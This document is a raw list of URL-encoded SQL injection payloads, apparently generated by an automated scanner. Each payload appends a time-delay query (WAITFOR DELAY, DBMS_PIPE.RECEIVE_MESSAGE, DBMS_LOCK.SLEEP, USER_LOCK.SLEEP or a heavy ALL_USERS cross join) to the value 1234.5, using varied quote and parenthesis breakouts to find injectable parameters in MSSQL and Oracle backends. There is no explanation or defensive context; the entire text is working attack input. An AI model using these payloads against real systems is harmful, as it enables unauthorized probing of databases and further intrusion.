1234.5%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%27mKte%27%3D%27mKte 1234.5%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%27Cobj%27%20LIKE%20%27Cobj 1234.5%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%27svaI%27%20LIKE%20%27svaI 1234.5%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%27nUda%27%20LIKE%20%27nUda 1234.5%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%27pdxm%27%20LIKE%20%27pdxm 1234.5%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%22MQxv%22%3D%22MQxv 1234.5%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%22VHXA%22%3D%22VHXA 1234.5%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%22uWzz%22%3D%22uWzz 1234.5%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%22fEuI%22%3D%22fEuI 1234.5%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%22Myye%22%20LIKE%20%22Myye 1234.5%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%22bMMo%22%20LIKE%20%22bMMo 1234.5%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%22vFkO%22%20LIKE%20%22vFkO 1234.5%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%22xMSk%22%20LIKE%20%22xMSk 1234.5%29%20WHERE%208372%3D8372%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1234.5%27%29%20WHERE%203777%3D3777%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1234.5%27%20WHERE%208355%3D8355%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1234.5%22%20WHERE%209523%3D9523%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1234.5%27%20%7C%7C%20%28SELECT%209017%20FROM%20DUAL%20WHERE%206084%3D6084%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205196%20WHERE%209814%3D9814%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205688%20FROM%20DUAL%20WHERE%201354%3D1354%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29 1234.5%20%2B%20%28SELECT%209136%20WHERE%205231%3D5231%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29 1234.5%27%20%2B%20%28SELECT%20%27wFtX%27%20FROM%20DUAL%20WHERE%203375%3D3375%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Zroy%27%20WHERE%207002%3D7002%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%23 1234.5%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B-- 1234.5%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B-- 1234.5%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B-- 1234.5%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B-- 1234.5%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%289413%3D9413 1234.5%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%283101%3D3101 1234.5%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%285940%3D5940 1234.5%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B-- 1234.5%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%27ZHQm%27%3D%27ZHQm 1234.5%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%27owUV%27%3D%27owUV 1234.5%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%27gpQI%27%3D%27gpQI 1234.5%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%27BpLE%27%3D%27BpLE 1234.5%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%27izyL%27%20LIKE%20%27izyL 1234.5%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%27vmAb%27%20LIKE%20%27vmAb 1234.5%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%27xHiQ%27%20LIKE%20%27xHiQ 1234.5%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%27jEAA%27%20LIKE%20%27jEAA 1234.5%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%22EVMq%22%3D%22EVMq 1234.5%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%22TXNM%22%3D%22TXNM 1234.5%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%22EJCp%22%3D%22EJCp 1234.5%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%22OLgY%22%3D%22OLgY 1234.5%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%22rsYt%22%20LIKE%20%22rsYt 1234.5%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%22hXkn%22%20LIKE%20%22hXkn 1234.5%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%22ckRs%22%20LIKE%20%22ckRs 1234.5%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%22vAuE%22%20LIKE%20%22vAuE 1234.5%29%20WHERE%208458%3D8458%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B-- 1234.5%27%29%20WHERE%202156%3D2156%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B-- 1234.5%27%20WHERE%202769%3D2769%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B-- 1234.5%22%20WHERE%209729%3D9729%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B-- 1234.5%27%20%7C%7C%20%28SELECT%201673%20FROM%20DUAL%20WHERE%201684%3D1684%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205084%20WHERE%201138%3D1138%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%202354%20FROM%20DUAL%20WHERE%206312%3D6312%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20%29 1234.5%20%2B%20%28SELECT%208665%20WHERE%209772%3D9772%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20%29 1234.5%27%20%2B%20%28SELECT%20%27epVz%27%20FROM%20DUAL%20WHERE%204153%3D4153%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27hmfl%27%20WHERE%203372%3D3372%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2885%29%7C%7CCHR%2887%29%7C%7CCHR%2872%29%7C%7CCHR%2869%29%2C5%29%20FROM%20DUAL%3B--%20%23 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%288836%3D8836 1234.5%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%289215%3D9215 1234.5%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%286686%3D6686 1234.5%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%27kqAr%27%3D%27kqAr 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%27MCtD%27%3D%27MCtD 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%27olCC%27%3D%27olCC 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%27gPBF%27%3D%27gPBF 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%27xUzM%27%20LIKE%20%27xUzM 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%27pGWn%27%20LIKE%20%27pGWn 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%27iRBG%27%20LIKE%20%27iRBG 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%27aOSY%27%20LIKE%20%27aOSY 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%22WiwE%22%3D%22WiwE 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%22QTAu%22%3D%22QTAu 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%22YfqL%22%3D%22YfqL 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%22lfDG%22%3D%22lfDG 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%22cdQd%22%20LIKE%20%22cdQd 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%22YwKE%22%20LIKE%20%22YwKE 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%22Fnxu%22%20LIKE%20%22Fnxu 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%22NKVu%22%20LIKE%20%22NKVu 1234.5%29%20WHERE%202878%3D2878%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1234.5%27%29%20WHERE%204882%3D4882%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1234.5%27%20WHERE%204045%3D4045%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1234.5%22%20WHERE%204670%3D4670%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1234.5%27%20%7C%7C%20%28SELECT%205434%20FROM%20DUAL%20WHERE%208578%3D8578%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203196%20WHERE%201343%3D1343%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205094%20FROM%20DUAL%20WHERE%205254%3D5254%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29 1234.5%20%2B%20%28SELECT%201550%20WHERE%209258%3D9258%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29 1234.5%27%20%2B%20%28SELECT%20%27VzOi%27%20FROM%20DUAL%20WHERE%209668%3D9668%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27MLQe%27%20WHERE%209036%3D9036%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%23 1234.5%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%289165%3D9165 1234.5%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%284920%3D4920 1234.5%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%286771%3D6771 1234.5%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27XKSu%27%3D%27XKSu 1234.5%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27sdTb%27%3D%27sdTb 1234.5%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27vuWK%27%3D%27vuWK 1234.5%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27KUJC%27%3D%27KUJC 1234.5%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27oCha%27%20LIKE%20%27oCha 1234.5%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27TaGB%27%20LIKE%20%27TaGB 1234.5%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27EKEX%27%20LIKE%20%27EKEX 1234.5%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27BoWc%27%20LIKE%20%27BoWc 1234.5%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22EqyW%22%3D%22EqyW 1234.5%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22vxaq%22%3D%22vxaq 1234.5%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22opBD%22%3D%22opBD 1234.5%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22gAdg%22%3D%22gAdg 1234.5%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22sntW%22%20LIKE%20%22sntW 1234.5%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%22Dvld%22%20LIKE%20%22Dvld 1234.5%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%22ApsV%22%20LIKE%20%22ApsV 1234.5%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%22XikW%22%20LIKE%20%22XikW 1234.5%29%20WHERE%206523%3D6523%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%29%20WHERE%208164%3D8164%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%20WHERE%206743%3D6743%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%22%20WHERE%207294%3D7294%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%20%7C%7C%20%28SELECT%203057%20FROM%20DUAL%20WHERE%201505%3D1505%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205448%20WHERE%203955%3D3955%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%207614%20FROM%20DUAL%20WHERE%206280%3D6280%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 1234.5%20%2B%20%28SELECT%209399%20WHERE%201064%3D1064%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29 1234.5%27%20%2B%20%28SELECT%20%27gAIk%27%20FROM%20DUAL%20WHERE%204372%3D4372%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Ydqd%27%20WHERE%207795%3D7795%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20%23 1234.5%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%283886%3D3886 1234.5%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%285524%3D5524 1234.5%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%282900%3D2900 1234.5%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B-- 1234.5%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27gVhk%27%3D%27gVhk 1234.5%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27OdoR%27%3D%27OdoR 1234.5%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27HoYP%27%3D%27HoYP 1234.5%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27WbIX%27%3D%27WbIX 1234.5%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27OFDv%27%20LIKE%20%27OFDv 1234.5%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27pEdH%27%20LIKE%20%27pEdH 1234.5%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27UDXR%27%20LIKE%20%27UDXR 1234.5%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27vlbw%27%20LIKE%20%27vlbw 